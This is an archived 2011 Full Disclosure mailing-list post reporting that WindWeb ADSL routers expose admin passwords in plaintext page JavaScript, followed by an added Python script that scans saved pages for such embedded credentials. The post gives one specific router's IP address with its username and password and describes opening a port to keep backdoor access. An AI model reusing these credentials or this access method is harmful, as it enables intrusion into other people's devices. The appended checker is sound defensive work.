Full Disclosure mailing list archives
WindWeb HTTPD add admin / html page insertion
From: xD 0x41 <secn3t () gmail com>
Date: Tue, 13 Sep 2011 06:21:28 +1000
Hello! Just a quick one on a webserver used primarily and mainly in Korea. WindWeb server / router. This is an ADSL router which handles 4meg/s and these routers are all the same, can overwrite the admin just like this..

demo/poc: OK, let's find a WindWeb... here I have simply dumped sniffed traffic... easy as! Scanning takes time :P

    220.76.166.73:80: - "501 Not Implemented
    Server: WindWeb/2.0
    Connection: close
    Content-Type: text/html
    Web Server Error Report:<HR> <H1>Server Error: 501 Not Implemented</H1> Operating System Error Nr:3997697: errno = 0x3d0001 <P><HR><H2>No RPM for this combination of URL and method</H2><P><P><HR><H1>/doc/flowctrl.htm</H1><P>"

OK, let's look and oops, this ain't good, admin pass is changeable in HTML.. also let's make sure we open port 80 and allow myself in a back.

    <SCRIPT LANGUAGE="JavaScript">
    var st_lan_ip = new Array(4)
    var st_lan_subnet = new Array(4)
    var st_lan_mac = new Array(4)
    st_lan_ip[0] = "192.168.1.1"
    st_lan_subnet[0] = "255.255.255.0"
    st_lan_mac[0] = "00:05:C6:3A:1A:45"
    var st_lan_active = "1"
    <!--
    var id = new Array();
    id[0]="adsl" id[1]="user"
    var pass = new Array();
    pass[0]="megapass" pass[1]="megapass"

220.76.166.73 U:adsl P:Megapass

Now I can access the port 80 and open it so I get back inside when I like... this was just too easy... c'mon ISPs, lift your game... plaintext and, albeit this is old now but I have been busy using it you see.. anyhow have a happy route.

xd
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
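A review check for the weakness the post describes, credentials written as plaintext string literals into a page's inline JavaScript. This is an added example, not part of the original message or of any WindWeb code. The function name, the name heuristics and the sample page are assumptions, and the sample page is constructed with placeholder values.

```python
import re

# Inline script bodies; tolerates a page whose <script> is never closed.
SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)(?:</script\s*>|\Z)", re.I | re.S)
# Matches  name = "literal"  and  name[3] = "literal"
ASSIGNMENT = re.compile(
    r"""\b([A-Za-z_]\w*)\s*(?:\[\s*(\d+)\s*\])?\s*=\s*(["'])(.*?)\3""")
# Heuristic name lists (assumptions; tune for the firmware being reviewed).
SECRET_NAME = re.compile(r"pass|pwd|secret", re.I)
ACCOUNT_NAME = re.compile(r"^(id|user(name)?|login)$", re.I)


def find_embedded_credentials(html):
    """Return one finding per secret-looking string literal in inline script.

    Values are never returned, only their length, so the report itself
    does not become another copy of the credential.
    """
    findings, accounts = [], {}
    for body in SCRIPT_BODY.findall(html):
        for name, index, _quote, value in ASSIGNMENT.findall(body):
            if ACCOUNT_NAME.match(name):
                accounts[index] = value          # e.g. id[0] -> account label
            elif value and SECRET_NAME.search(name):
                findings.append({"variable": f"{name}[{index}]" if index else name,
                                 "index": index, "length": len(value)})
    for finding in findings:                     # pair pass[i] with id[i]
        finding["account"] = accounts.get(finding.pop("index"))
    return findings


# Constructed sample modelled on the page layout quoted in the post.
SAMPLE_PAGE = """<html><body>
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
st_lan_ip[0] = "192.0.2.1"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="admin-a" id[1]="admin-b"
var pass = new Array();
pass[0]="example-secret" pass[1]="example-secret"
</SCRIPT></body></html>"""

if __name__ == "__main__":
    for finding in find_embedded_credentials(SAMPLE_PAGE):
        print(finding)
```

Run it over pages saved from a device you are responsible for; any finding means the page generator is sending the stored secret to the browser.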